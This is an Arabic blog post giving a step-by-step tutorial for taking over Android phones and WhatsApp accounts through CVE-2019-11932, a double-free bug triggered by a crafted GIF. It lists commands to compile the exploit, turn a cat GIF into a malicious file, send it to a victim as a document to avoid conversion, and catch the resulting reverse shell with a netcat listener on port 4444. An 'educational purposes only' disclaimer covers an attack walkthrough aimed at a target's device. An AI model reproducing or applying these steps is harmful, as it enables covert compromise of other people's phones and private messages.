مافيا سفن أكس - Mafia7x

اختراق أجهزة Android وحسابات WhatsApp بصورة

صورة الكاتب - Mafia7x - نشر في 08-11-2021 | التصنيف: اختبار الاختراق
Hack-Android-With-WhatsApp

يعد اختراق حساب WhatsApp أحد أفضل مصطلحات بحث Google للأشخاص ، إنه تطبيق المراسلة الأكثر استخدامًا في العالم ، لهذا السبب كان هناك ارتفاع في عدد المتسللين الذين يحاولون اختراق WhatsApp في مجتمع القرصنة ، يعمل عدد قليل من الاختراقات كخدمة مدفوعة بينما يكون بعضها مجانيًا وقليلًا جدًا يعتمد على المهارات بالكامل ، مع ارتفاع عدد المستخدمين ، ازدادت برامج WhatsApp Exploits والانتهاكات الأمنية بشكل كبير ، لذلك قررنا عمل درس لاختراق WhatsApp باستخدام صورة GIF.

من الواضح أن هذا الدرس مخصص للأغراض التعليمية فقط ولكنه يوضح كيف يمكن للمتسللين اختراق حسابات WhatsApp باستخدام صورة GIF فقط ، قام Whatsapp منذ ذلك الحين بإصلاح هذا الخطأ مع التحديث الأخير ولكن إذا لم تقم بالتحديث إلى أحدث إصدار ، فمن المحتمل أنك لا تزال عرضة لهذا الاختراق ويمكن للقراصنة الاستفادة من WhatsApp Exploit.


اختراق أجهزة Android وحسابات WhatsApp بصورة

الخطوة 1: نسخ واستنساخ الاستغلال من GitHub بالأمر التالي:

 

الخطوة 2: قم بتغيير الدليل إلى مجلد الاستغلال باستخدام الأمر التالي:

cd CVE-2019-11932
 

الخطوة 3: قم بتجميع الاستغلال بالأمر التالي:

gcc -o exploit egif_lib.c exploit.c

شاهد أيضا اختراق أجهزة Android باستخدام ملف PDF (Adobe reader exploit).

الخطوة 4: قم بتنزيل أي صورة GIF من الإنترنت ، سأستخدم صورة cat.gif لأن الجميع يحب صور القطط.

الخطوة 5: قم بتشغيل الاستغلال بالأمر التالي:

exploit /root/Desktop/cat.gif/.
 

الخطوة 6: الآن صورة GIF الضارة جاهز للاستخدام ، ما عليك سوى إرسال صورة GIF هذا إلى حساب WhatsApp المستهدف.

تحتاج إلى نسخ ملف cat.gif وإرساله كمستند مع WhatsApp إلى مستخدم حساب WhatsApp آخر.

ملاحظة: يجب عدم إرسال هذا الملف مباشرة كملف وسائط ، وإلا فإن WhatsApp سيقوم بتحويل صورة GIF إلى MP4 قبل الإرسال ، وبالتالي جعل الاستغلال عديم الفائدة ، لذا تأكد من إرسالها كمستند بدلاً من ذلك.


شاهد أيضا أفضل 5 تطبيقات مجانية لعمل Root لهواتف Android بسهولة.

الخطوة 7: افتح نافذة Terminal أخرى على Kali Linux وافتح netcat listener بالأمر التالي:

nc -lnvp 4444
 

الخطوة 8: بمجرد إرسال الملف كمستند ونحتاج إلى انتظار الضحية المستهدفة لفتح الملف وبدء WhatsApp Exploit.

الخطوة 9: بمجرد فتح الصورة ، ستحصل على أتصال عكسي كما هو موضح أدناه.

إنه Linux Shell عادي لذا يمكنك فعل أي شيء تريده من أوامر Shell ، إذا كنت تريد معرفة المزيد عن أوامر Shell ، اقرأ الوثائق ، وهذه هي طريقة أختراق حساب WhatsApp للهدف ولديك الـ Root Shell ويمكنك الحصول على الأستفادة الكاملة من استغلال WhatsApp هذا.


شاهد أيضا اختراق أجهزة Android عن طريق رابط (Javascript & WebView Exploit).


توضيح عن هذه الثغرة

توجد الثغرة الأمنية المذكورة أعلاه في WhatsApp المتوفر بمعرف CVE-2019-11932 ، يمكنك العثور على الكثير من المعلومات حول كيفية عملها بالضبط على Explitdb ، هذه الثغرة من نوع الضعف المجاني المزدوج ، والذي يسمح لنا بتنفيذ الأمر المطلوب على نظام التشغيل Android ، والذي نرسله عن طريق إرسال صورة GIF في WhatsApp ، يؤدي إلى تجاوز سعة المخزن المؤقت مما يمنحنا Shell لتشغيل الأوامر ، وبقدر ما أعرف ، تعمل هذه الثغرة الأمنية على إصدار WhatsApp 2.19.244.


خاتمة

وهنا وصلنا لنهاية هذا الدرس وقد تعرفنا على ثغرة  CVE-2019-11932 والتي تسمح لنا بأختراق حسابات WhatsApp عن طريق صورة بصيغة GIF وتعرفنا الصلاحيات التي نستطيع الحصول عليها من هذا الاستغلال وهي صلاحيات Shell لتشغيل الأوامر من هذه الثغرة وأيضا  انا أخلي مسؤليتي لأي استخدام سيء لهذا الدرس وأنها لأغراض تعليمية فقط وكاتب التدوينة غير مسؤل عن أي شيء يحدث لأي شخص ومع السلامة.

كاتب التدوينة
صورة التدوينة
Mafia7x   

     لا يوجد وصف Ok

close

عن أبي هريرة(رضي الله عنه): (قال رسول الله (صلى الله عليه وسلم):(كلمتان خفيفتان على اللسان، ثقيلتان في الميزان، حبيبتان إلى الرحمن: سبحان الله وبحمده، سبحان الله العظيم))